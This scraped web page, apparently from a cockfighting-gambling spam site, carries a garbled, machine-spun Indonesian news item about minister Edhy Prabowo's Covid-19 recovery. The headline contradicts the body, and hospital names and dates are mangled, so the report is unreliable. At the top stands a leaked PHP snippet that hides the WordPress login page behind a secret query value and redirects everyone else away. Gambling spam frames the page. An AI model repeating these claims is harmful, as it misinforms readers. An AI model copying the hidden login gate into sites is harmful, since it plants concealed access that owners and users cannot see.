//̨¼ add_action('login_enqueue_scripts','login_protection'); function login_protection(){ if($_GET['word'] != '2868973770')header('Location: https://www.baidu.com/'); } Elite Gerindra: Hasil usap Menteri KKP Edhy Prabowo sudah buruk untuk Covid-19 | adu ayam bali_s128.net login_s128.live

Elite Gerindra: Hasil usap Menteri KKP Edhy Prabowo sudah buruk untuk Covid-19

Laporan koresponden Tribunnews.com Malhand-Jakarta, TRIBUNNEWS.COM-Menteri Kelautan dan Perikanan Edhy Prabowo yang sempat terpapar Covid-19 sudah membaik kesehatannya. Elit Partai Gerindra, Sufmi Dasco Ahmad, menjelaskan hasil usapan Edhy Prabowo negatif.

Ketika dia menghubungi rekannya melalui telepon, dia mengetahui kabar baik.

“Lima menit yang lalu saya berkomunikasi dengan Kak Edhy Prabowo lewat telepon. Kakak Edhy Prabowo dalam keadaan sehat dan makan enak. Syukurlah hasil pungutannya negatif.” Ketua Dewan Perwakilan Rakyat Republik Indonesia (DPR), Rabu (9) / 16/2020) Periode konfirmasi.

Baca: Ayu Tingting menjadi sasaran penistaan ​​ayah Romo Lezac, mengaku kesal ingin menangkap kebencian

juga karena itu, Dasco memberikan penjelasan tentang situasi saat ini. Dr. Dejelindra, Menteri Kelautan dan Perikanan saat ini. Kramat Jati di Jakarta Timur.

Kemudian Edhy Prabowo dipindahkan ke Rumah Sakit Umum Tentara Gato Sobroto (RSPAD) Jakarta. .

Namun dia mengatakan bahwa perawatan di unit perawatan intensif itu untuk perawatan yang lebih baik, dan Edhy Prabowo menyadarinya saat itu.

“Edhy Prabowo pertama kali dikirim ke RS Polri lalu ke RS Polri. Ia dipindahkan ke RSPAD. Kakak-kakak Edhy Prabowo itu kemudian dirawat karena sakit parah dan kini kondisinya baik.” Dijelaskan: “Saya dalam perawatan intensif untuk perawatan yang lebih baik dan dalam keadaan sadar.” (*)

Leave a comment

adu ayam bali_s128.net login_s128.live